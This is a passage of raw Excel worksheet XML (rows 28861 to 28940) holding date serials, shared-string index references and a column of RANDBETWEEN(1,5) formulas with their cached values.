        <v>3</v>
      </c>
    </row>
    <row r="28861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28861" s="1">
        <v>42837.014097222222</v>
      </c>
      <c r="C28861" t="s">
        <v>140</v>
      </c>
      <c r="D28861" t="s">
        <v>141</v>
      </c>
      <c r="E28861" t="s">
        <v>26305</v>
      </c>
      <c r="F28861">
        <f t="shared" ca="1" si="450"/>
        <v>5</v>
      </c>
    </row>
    <row r="28862" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A28862" s="1">
        <v>42836.966180555559</v>
      </c>
      <c r="C28862" t="s">
        <v>144</v>
      </c>
      <c r="E28862" s="2" t="s">
        <v>26306</v>
      </c>
      <c r="F28862">
        <f t="shared" ca="1" si="450"/>
        <v>3</v>
      </c>
    </row>
    <row r="28863" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28863" s="1">
        <v>42836.808761574073</v>
      </c>
      <c r="C28863" t="s">
        <v>16</v>
      </c>
      <c r="F28863">
        <f t="shared" ca="1" si="450"/>
        <v>1</v>
      </c>
    </row>
    <row r="28864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28864" s="1">
        <v>42836.797743055555</v>
      </c>
      <c r="C28864" t="s">
        <v>10</v>
      </c>
      <c r="D28864" t="s">
        <v>46</v>
      </c>
      <c r="E28864" t="s">
        <v>26307</v>
      </c>
      <c r="F28864">
        <f t="shared" ca="1" si="450"/>
        <v>4</v>
      </c>
    </row>
    <row r="28865" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28865" s="1">
        <v>42836.760381944441</v>
      </c>
      <c r="C28865" t="s">
        <v>10</v>
      </c>
      <c r="D28865" t="s">
        <v>6</v>
      </c>
      <c r="E28865" t="s">
        <v>26308</v>
      </c>
      <c r="F28865">
        <f t="shared" ca="1" si="450"/>
        <v>2</v>
      </c>
    </row>
    <row r="28866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28866" s="1">
        <v>42836.727777777778</v>
      </c>
      <c r="C28866" t="s">
        <v>10</v>
      </c>
      <c r="D28866" t="s">
        <v>158</v>
      </c>
      <c r="E28866" t="s">
        <v>26309</v>
      </c>
      <c r="F28866">
        <f t="shared" ref="F28866:F28929" ca="1" si="451">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="28867" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A28867" s="1">
        <v>42836.698738425926</v>
      </c>
      <c r="C28867" t="s">
        <v>260</v>
      </c>
      <c r="E28867" s="2" t="s">
        <v>26310</v>
      </c>
      <c r="F28867">
        <f t="shared" ca="1" si="451"/>
        <v>4</v>
      </c>
    </row>
    <row r="28868" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A28868" s="1">
        <v>42836.635821759257</v>
      </c>
      <c r="C28868" t="s">
        <v>10</v>
      </c>
      <c r="D28868" t="s">
        <v>17</v>
      </c>
      <c r="E28868" s="2" t="s">
        <v>26311</v>
      </c>
      <c r="F28868">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28869" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28869" s="1">
        <v>42836.594189814816</v>
      </c>
      <c r="C28869" t="s">
        <v>10</v>
      </c>
      <c r="D28869" t="s">
        <v>17</v>
      </c>
      <c r="E28869" t="s">
        <v>26312</v>
      </c>
      <c r="F28869">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28870" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28870" s="1">
        <v>42836.58185185185</v>
      </c>
      <c r="C28870" t="s">
        <v>10</v>
      </c>
      <c r="D28870" t="s">
        <v>80</v>
      </c>
      <c r="E28870" t="s">
        <v>26313</v>
      </c>
      <c r="F28870">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28871" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28871" s="1">
        <v>42836.542986111112</v>
      </c>
      <c r="C28871" t="s">
        <v>10</v>
      </c>
      <c r="D28871" t="s">
        <v>86</v>
      </c>
      <c r="E28871" s="2" t="s">
        <v>26314</v>
      </c>
      <c r="F28871">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28872" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28872" s="1">
        <v>42836.533043981479</v>
      </c>
      <c r="C28872" t="s">
        <v>10</v>
      </c>
      <c r="D28872" t="s">
        <v>92</v>
      </c>
      <c r="E28872" s="2" t="s">
        <v>26315</v>
      </c>
      <c r="F28872">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28873" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28873" s="1">
        <v>42836.513703703706</v>
      </c>
      <c r="C28873" t="s">
        <v>10</v>
      </c>
      <c r="D28873" t="s">
        <v>251</v>
      </c>
      <c r="E28873" t="s">
        <v>26316</v>
      </c>
      <c r="F28873">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28874" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28874" s="1">
        <v>42836.511921296296</v>
      </c>
      <c r="C28874" t="s">
        <v>10</v>
      </c>
      <c r="D28874" t="s">
        <v>6</v>
      </c>
      <c r="E28874" t="s">
        <v>26317</v>
      </c>
      <c r="F28874">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28875" s="1">
        <v>42836.509166666663</v>
      </c>
      <c r="C28875" t="s">
        <v>71</v>
      </c>
      <c r="E28875" t="s">
        <v>26318</v>
      </c>
      <c r="F28875">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28876" s="1">
        <v>42836.507407407407</v>
      </c>
      <c r="C28876" t="s">
        <v>260</v>
      </c>
      <c r="E28876" t="s">
        <v>26319</v>
      </c>
      <c r="F28876">
        <f t="shared" ca="1" si="451"/>
        <v>2</v>
      </c>
    </row>
    <row r="28877" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28877" s="1">
        <v>42836.503425925926</v>
      </c>
      <c r="C28877" t="s">
        <v>10</v>
      </c>
      <c r="D28877" t="s">
        <v>6</v>
      </c>
      <c r="E28877" t="s">
        <v>26320</v>
      </c>
      <c r="F28877">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28878" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28878" s="1">
        <v>42836.488391203704</v>
      </c>
      <c r="C28878" t="s">
        <v>6</v>
      </c>
      <c r="D28878" t="s">
        <v>67</v>
      </c>
      <c r="E28878" s="2" t="s">
        <v>26321</v>
      </c>
      <c r="F28878">
        <f t="shared" ca="1" si="451"/>
        <v>2</v>
      </c>
    </row>
    <row r="28879" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28879" s="1">
        <v>42836.480208333334</v>
      </c>
      <c r="C28879" t="s">
        <v>6</v>
      </c>
      <c r="D28879" t="s">
        <v>25</v>
      </c>
      <c r="E28879" t="s">
        <v>26322</v>
      </c>
      <c r="F28879">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28880" s="1">
        <v>42836.478043981479</v>
      </c>
      <c r="C28880" t="s">
        <v>71</v>
      </c>
      <c r="E28880" t="s">
        <v>26323</v>
      </c>
      <c r="F28880">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28881" s="1">
        <v>42836.466550925928</v>
      </c>
      <c r="C28881" t="s">
        <v>10</v>
      </c>
      <c r="D28881" t="s">
        <v>494</v>
      </c>
      <c r="E28881" t="s">
        <v>26324</v>
      </c>
      <c r="F28881">
        <f t="shared" ca="1" si="451"/>
        <v>4</v>
      </c>
    </row>
    <row r="28882" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28882" s="1">
        <v>42836.464444444442</v>
      </c>
      <c r="C28882" t="s">
        <v>260</v>
      </c>
      <c r="E28882" s="2" t="s">
        <v>26325</v>
      </c>
      <c r="F28882">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28883" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A28883" s="1">
        <v>42836.459629629629</v>
      </c>
      <c r="C28883" t="s">
        <v>65</v>
      </c>
      <c r="E28883" s="2" t="s">
        <v>26326</v>
      </c>
      <c r="F28883">
        <f t="shared" ca="1" si="451"/>
        <v>4</v>
      </c>
    </row>
    <row r="28884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28884" s="1">
        <v>42836.455879629626</v>
      </c>
      <c r="C28884" t="s">
        <v>63</v>
      </c>
      <c r="E28884" t="s">
        <v>26327</v>
      </c>
      <c r="F28884">
        <f t="shared" ca="1" si="451"/>
        <v>4</v>
      </c>
    </row>
    <row r="28885" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A28885" s="1">
        <v>42836.443182870367</v>
      </c>
      <c r="C28885" t="s">
        <v>65</v>
      </c>
      <c r="E28885" s="2" t="s">
        <v>26328</v>
      </c>
      <c r="F28885">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28886" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28886" s="1">
        <v>42836.436284722222</v>
      </c>
      <c r="C28886" t="s">
        <v>48</v>
      </c>
      <c r="E28886" s="2" t="s">
        <v>26329</v>
      </c>
      <c r="F28886">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28887" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28887" s="1">
        <v>42836.435393518521</v>
      </c>
      <c r="C28887" t="s">
        <v>50</v>
      </c>
      <c r="F28887">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28888" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28888" s="1">
        <v>42836.433553240742</v>
      </c>
      <c r="C28888" t="s">
        <v>10</v>
      </c>
      <c r="D28888" t="s">
        <v>192</v>
      </c>
      <c r="E28888" t="s">
        <v>26330</v>
      </c>
      <c r="F28888">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28889" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28889" s="1">
        <v>42836.427766203706</v>
      </c>
      <c r="C28889" t="s">
        <v>189</v>
      </c>
      <c r="E28889" t="s">
        <v>26331</v>
      </c>
      <c r="F28889">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28890" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28890" s="1">
        <v>42836.426377314812</v>
      </c>
      <c r="C28890" t="s">
        <v>318</v>
      </c>
      <c r="E28890" s="2" t="s">
        <v>26332</v>
      </c>
      <c r="F28890">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28891" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A28891" s="1">
        <v>42836.413993055554</v>
      </c>
      <c r="C28891" t="s">
        <v>48</v>
      </c>
      <c r="E28891" s="2" t="s">
        <v>26333</v>
      </c>
      <c r="F28891">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28892" s="1">
        <v>42836.405219907407</v>
      </c>
      <c r="C28892" t="s">
        <v>189</v>
      </c>
      <c r="E28892" t="s">
        <v>26334</v>
      </c>
      <c r="F28892">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28893" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A28893" s="1">
        <v>42836.404768518521</v>
      </c>
      <c r="C28893" t="s">
        <v>60</v>
      </c>
      <c r="E28893" s="2" t="s">
        <v>26335</v>
      </c>
      <c r="F28893">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28894" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A28894" s="1">
        <v>42836.395914351851</v>
      </c>
      <c r="C28894" t="s">
        <v>6</v>
      </c>
      <c r="D28894" t="s">
        <v>25</v>
      </c>
      <c r="E28894" s="2" t="s">
        <v>26336</v>
      </c>
      <c r="F28894">
        <f t="shared" ca="1" si="451"/>
        <v>4</v>
      </c>
    </row>
    <row r="28895" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28895" s="1">
        <v>42836.344548611109</v>
      </c>
      <c r="C28895" t="s">
        <v>73</v>
      </c>
      <c r="E28895" t="s">
        <v>26337</v>
      </c>
      <c r="F28895">
        <f t="shared" ca="1" si="451"/>
        <v>2</v>
      </c>
    </row>
    <row r="28896" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28896" s="1">
        <v>42836.298136574071</v>
      </c>
      <c r="C28896" t="s">
        <v>73</v>
      </c>
      <c r="E28896" t="s">
        <v>26338</v>
      </c>
      <c r="F28896">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28897" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28897" s="1">
        <v>42836.250775462962</v>
      </c>
      <c r="C28897" t="s">
        <v>836</v>
      </c>
      <c r="E28897" s="2" t="s">
        <v>26339</v>
      </c>
      <c r="F28897">
        <f t="shared" ca="1" si="451"/>
        <v>4</v>
      </c>
    </row>
    <row r="28898" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28898" s="1">
        <v>42836.222418981481</v>
      </c>
      <c r="C28898" t="s">
        <v>48</v>
      </c>
      <c r="E28898" s="2" t="s">
        <v>26340</v>
      </c>
      <c r="F28898">
        <f t="shared" ca="1" si="451"/>
        <v>2</v>
      </c>
    </row>
    <row r="28899" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28899" s="1">
        <v>42836.210775462961</v>
      </c>
      <c r="C28899" t="s">
        <v>134</v>
      </c>
      <c r="E28899" s="2" t="s">
        <v>26341</v>
      </c>
      <c r="F28899">
        <f t="shared" ca="1" si="451"/>
        <v>4</v>
      </c>
    </row>
    <row r="28900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28900" s="1">
        <v>42836.207453703704</v>
      </c>
      <c r="C28900" t="s">
        <v>173</v>
      </c>
      <c r="E28900" t="s">
        <v>26342</v>
      </c>
      <c r="F28900">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28901" s="1">
        <v>42836.190682870372</v>
      </c>
      <c r="C28901" t="s">
        <v>71</v>
      </c>
      <c r="E28901" t="s">
        <v>26343</v>
      </c>
      <c r="F28901">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28902" s="1">
        <v>42836.0703587963</v>
      </c>
      <c r="C28902" t="s">
        <v>41</v>
      </c>
      <c r="E28902" t="s">
        <v>26344</v>
      </c>
      <c r="F28902">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28903" s="1">
        <v>42836.047476851854</v>
      </c>
      <c r="C28903" t="s">
        <v>41</v>
      </c>
      <c r="E28903" t="s">
        <v>26345</v>
      </c>
      <c r="F28903">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28904" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A28904" s="1">
        <v>42836.044699074075</v>
      </c>
      <c r="C28904" t="s">
        <v>140</v>
      </c>
      <c r="D28904" t="s">
        <v>234</v>
      </c>
      <c r="E28904" s="2" t="s">
        <v>26346</v>
      </c>
      <c r="F28904">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28905" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28905" s="1">
        <v>42835.975613425922</v>
      </c>
      <c r="C28905" t="s">
        <v>301</v>
      </c>
      <c r="E28905" t="s">
        <v>26347</v>
      </c>
      <c r="F28905">
        <f t="shared" ca="1" si="451"/>
        <v>2</v>
      </c>
    </row>
    <row r="28906" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28906" s="1">
        <v>42835.928287037037</v>
      </c>
      <c r="C28906" t="s">
        <v>410</v>
      </c>
      <c r="E28906" t="s">
        <v>26348</v>
      </c>
      <c r="F28906">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28907" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28907" s="1">
        <v>42835.923773148148</v>
      </c>
      <c r="C28907" t="s">
        <v>222</v>
      </c>
      <c r="E28907" t="s">
        <v>26349</v>
      </c>
      <c r="F28907">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28908" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28908" s="1">
        <v>42835.889178240737</v>
      </c>
      <c r="C28908" t="s">
        <v>10</v>
      </c>
      <c r="D28908" t="s">
        <v>89</v>
      </c>
      <c r="E28908" t="s">
        <v>26350</v>
      </c>
      <c r="F28908">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28909" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28909" s="1">
        <v>42835.876273148147</v>
      </c>
      <c r="C28909" t="s">
        <v>41</v>
      </c>
      <c r="E28909" t="s">
        <v>26351</v>
      </c>
      <c r="F28909">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28910" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28910" s="1">
        <v>42835.84207175926</v>
      </c>
      <c r="C28910" t="s">
        <v>319</v>
      </c>
      <c r="E28910" s="2" t="s">
        <v>26352</v>
      </c>
      <c r="F28910">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28911" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A28911" s="1">
        <v>42835.699733796297</v>
      </c>
      <c r="C28911" t="s">
        <v>10</v>
      </c>
      <c r="D28911" t="s">
        <v>71</v>
      </c>
      <c r="E28911" s="2" t="s">
        <v>26353</v>
      </c>
      <c r="F28911">
        <f t="shared" ca="1" si="451"/>
        <v>2</v>
      </c>
    </row>
    <row r="28912" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28912" s="1">
        <v>42835.698344907411</v>
      </c>
      <c r="C28912" t="s">
        <v>10</v>
      </c>
      <c r="D28912" t="s">
        <v>36</v>
      </c>
      <c r="E28912" s="2" t="s">
        <v>26354</v>
      </c>
      <c r="F28912">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28913" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28913" s="1">
        <v>42835.687777777777</v>
      </c>
      <c r="C28913" t="s">
        <v>535</v>
      </c>
      <c r="F28913">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28914" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28914" s="1">
        <v>42835.683113425926</v>
      </c>
      <c r="C28914" t="s">
        <v>280</v>
      </c>
      <c r="E28914" t="s">
        <v>26355</v>
      </c>
      <c r="F28914">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28915" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28915" s="1">
        <v>42835.645868055559</v>
      </c>
      <c r="C28915" t="s">
        <v>10</v>
      </c>
      <c r="D28915" t="s">
        <v>151</v>
      </c>
      <c r="E28915" s="2" t="s">
        <v>26356</v>
      </c>
      <c r="F28915">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28916" s="1">
        <v>42835.641608796293</v>
      </c>
      <c r="C28916" t="s">
        <v>10</v>
      </c>
      <c r="D28916" t="s">
        <v>17</v>
      </c>
      <c r="E28916" t="s">
        <v>26357</v>
      </c>
      <c r="F28916">
        <f t="shared" ca="1" si="451"/>
        <v>4</v>
      </c>
    </row>
    <row r="28917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28917" s="1">
        <v>42835.632777777777</v>
      </c>
      <c r="C28917" t="s">
        <v>10</v>
      </c>
      <c r="D28917" t="s">
        <v>494</v>
      </c>
      <c r="E28917" t="s">
        <v>26358</v>
      </c>
      <c r="F28917">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28918" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28918" s="1">
        <v>42835.591550925928</v>
      </c>
      <c r="C28918" t="s">
        <v>10</v>
      </c>
      <c r="D28918" t="s">
        <v>192</v>
      </c>
      <c r="E28918" t="s">
        <v>26359</v>
      </c>
      <c r="F28918">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28919" s="1">
        <v>42835.585034722222</v>
      </c>
      <c r="C28919" t="s">
        <v>10</v>
      </c>
      <c r="D28919" t="s">
        <v>89</v>
      </c>
      <c r="E28919" t="s">
        <v>26360</v>
      </c>
      <c r="F28919">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28920" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28920" s="1">
        <v>42835.583391203705</v>
      </c>
      <c r="C28920" t="s">
        <v>724</v>
      </c>
      <c r="E28920" t="s">
        <v>26361</v>
      </c>
      <c r="F28920">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28921" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A28921" s="1">
        <v>42835.580081018517</v>
      </c>
      <c r="C28921" t="s">
        <v>6</v>
      </c>
      <c r="D28921" t="s">
        <v>25</v>
      </c>
      <c r="E28921" s="2" t="s">
        <v>26362</v>
      </c>
      <c r="F28921">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28922" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28922" s="1">
        <v>42835.575740740744</v>
      </c>
      <c r="C28922" t="s">
        <v>10</v>
      </c>
      <c r="D28922" t="s">
        <v>6</v>
      </c>
      <c r="E28922" t="s">
        <v>26363</v>
      </c>
      <c r="F28922">
        <f t="shared" ca="1" si="451"/>
        <v>2</v>
      </c>
    </row>
    <row r="28923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28923" s="1">
        <v>42835.566631944443</v>
      </c>
      <c r="C28923" t="s">
        <v>260</v>
      </c>
      <c r="E28923" t="s">
        <v>26364</v>
      </c>
      <c r="F28923">
        <f t="shared" ca="1" si="451"/>
        <v>5</v>
      </c>
    </row>
    <row r="28924" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28924" s="1">
        <v>42835.545520833337</v>
      </c>
      <c r="C28924" t="s">
        <v>6</v>
      </c>
      <c r="D28924" t="s">
        <v>25</v>
      </c>
      <c r="E28924" t="s">
        <v>26365</v>
      </c>
      <c r="F28924">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28925" s="1">
        <v>42835.541724537034</v>
      </c>
      <c r="C28925" t="s">
        <v>10</v>
      </c>
      <c r="D28925" t="s">
        <v>94</v>
      </c>
      <c r="E28925" t="s">
        <v>26366</v>
      </c>
      <c r="F28925">
        <f t="shared" ca="1" si="451"/>
        <v>1</v>
      </c>
    </row>
    <row r="28926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28926" s="1">
        <v>42835.536064814813</v>
      </c>
      <c r="C28926" t="s">
        <v>10</v>
      </c>
      <c r="D28926" t="s">
        <v>33</v>
      </c>
      <c r="E28926" t="s">
        <v>26367</v>
      </c>
      <c r="F28926">
        <f t="shared" ca="1" si="451"/>
        <v>2</v>
      </c>
    </row>
    <row r="28927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28927" s="1">
        <v>42835.533009259256</v>
      </c>
      <c r="C28927" t="s">
        <v>103</v>
      </c>
      <c r="E28927" t="s">
        <v>26368</v>
      </c>
      <c r="F28927">
        <f t="shared" ca="1" si="451"/>
        <v>2</v>
      </c>
    </row>
    <row r="28928" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A28928" s="1">
        <v>42835.510555555556</v>
      </c>
      <c r="C28928" t="s">
        <v>10</v>
      </c>
      <c r="D28928" t="s">
        <v>192</v>
      </c>
      <c r="E28928" s="2" t="s">
        <v>26369</v>
      </c>
      <c r="F28928">
        <f t="shared" ca="1" si="451"/>
        <v>3</v>
      </c>
    </row>
    <row r="28929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28929" s="1">
        <v>42835.508379629631</v>
      </c>
      <c r="C28929" t="s">
        <v>48</v>
      </c>
      <c r="E28929" t="s">
        <v>26370</v>
      </c>
      <c r="F28929">
        <f t="shared" ca="1" si="451"/>
        <v>4</v>
      </c>
    </row>
    <row r="28930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28930" s="1">
        <v>42835.495173611111</v>
      </c>
      <c r="C28930" t="s">
        <v>10</v>
      </c>
      <c r="D28930" t="s">
        <v>89</v>
      </c>
      <c r="E28930" t="s">
        <v>26371</v>
      </c>
      <c r="F28930">
        <f t="shared" ref="F28930:F28993" ca="1" si="452">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="28931" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A28931" s="1">
        <v>42835.483622685184</v>
      </c>
      <c r="C28931" t="s">
        <v>10</v>
      </c>
      <c r="D28931" t="s">
        <v>52</v>
      </c>
      <c r="E28931" s="2" t="s">
        <v>26372</v>
      </c>
      <c r="F28931">
        <f t="shared" ca="1" si="452"/>
        <v>4</v>
      </c>
    </row>
    <row r="28932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28932" s="1">
        <v>42835.478414351855</v>
      </c>
      <c r="C28932" t="s">
        <v>48</v>
      </c>
      <c r="E28932" t="s">
        <v>26373</v>
      </c>
      <c r="F28932">
        <f t="shared" ca="1" si="452"/>
        <v>2</v>
      </c>
    </row>
    <row r="28933" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28933" s="1">
        <v>42835.458067129628</v>
      </c>
      <c r="C28933" t="s">
        <v>10</v>
      </c>
      <c r="D28933" t="s">
        <v>244</v>
      </c>
      <c r="E28933" s="2" t="s">
        <v>26374</v>
      </c>
      <c r="F28933">
        <f t="shared" ca="1" si="452"/>
        <v>3</v>
      </c>
    </row>
    <row r="28934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28934" s="1">
        <v>42835.427210648151</v>
      </c>
      <c r="C28934" t="s">
        <v>10</v>
      </c>
      <c r="D28934" t="s">
        <v>36</v>
      </c>
      <c r="E28934" t="s">
        <v>26375</v>
      </c>
      <c r="F28934">
        <f t="shared" ca="1" si="452"/>
        <v>5</v>
      </c>
    </row>
    <row r="28935" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A28935" s="1">
        <v>42835.405729166669</v>
      </c>
      <c r="C28935" t="s">
        <v>10</v>
      </c>
      <c r="D28935" t="s">
        <v>36</v>
      </c>
      <c r="E28935" s="2" t="s">
        <v>26376</v>
      </c>
      <c r="F28935">
        <f t="shared" ca="1" si="452"/>
        <v>5</v>
      </c>
    </row>
    <row r="28936" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28936" s="1">
        <v>42835.399814814817</v>
      </c>
      <c r="C28936" t="s">
        <v>10</v>
      </c>
      <c r="D28936" t="s">
        <v>271</v>
      </c>
      <c r="E28936" t="s">
        <v>26377</v>
      </c>
      <c r="F28936">
        <f t="shared" ca="1" si="452"/>
        <v>3</v>
      </c>
    </row>
    <row r="28937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28937" s="1">
        <v>42835.380243055559</v>
      </c>
      <c r="C28937" t="s">
        <v>10</v>
      </c>
      <c r="E28937" t="s">
        <v>26378</v>
      </c>
      <c r="F28937">
        <f t="shared" ca="1" si="452"/>
        <v>5</v>
      </c>
    </row>
    <row r="28938" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28938" s="1">
        <v>42835.32476851852</v>
      </c>
      <c r="C28938" t="s">
        <v>189</v>
      </c>
      <c r="E28938" s="2" t="s">
        <v>26379</v>
      </c>
      <c r="F28938">
        <f t="shared" ca="1" si="452"/>
        <v>3</v>
      </c>
    </row>
    <row r="28939" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28939" s="1">
        <v>42835.313715277778</v>
      </c>
      <c r="C28939" t="s">
        <v>48</v>
      </c>
      <c r="E28939" s="2" t="s">
        <v>26380</v>
      </c>
      <c r="F28939">
        <f t="shared" ca="1" si="452"/>
        <v>4</v>
      </c>
    </row>
    <row r="28940" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A28940" s="1">
        <v>42835.311539351853</v>
      </c>
      <c r="C28940" t="s">
        <v>134</v>
      </c>
      <c r="E28940" s="2" t="s">
        <v>26381</v>
      </c>
      <c r="F28940">
        <f t="shared" ca="1" si="452"/>
        <v>2</v>
      </c>
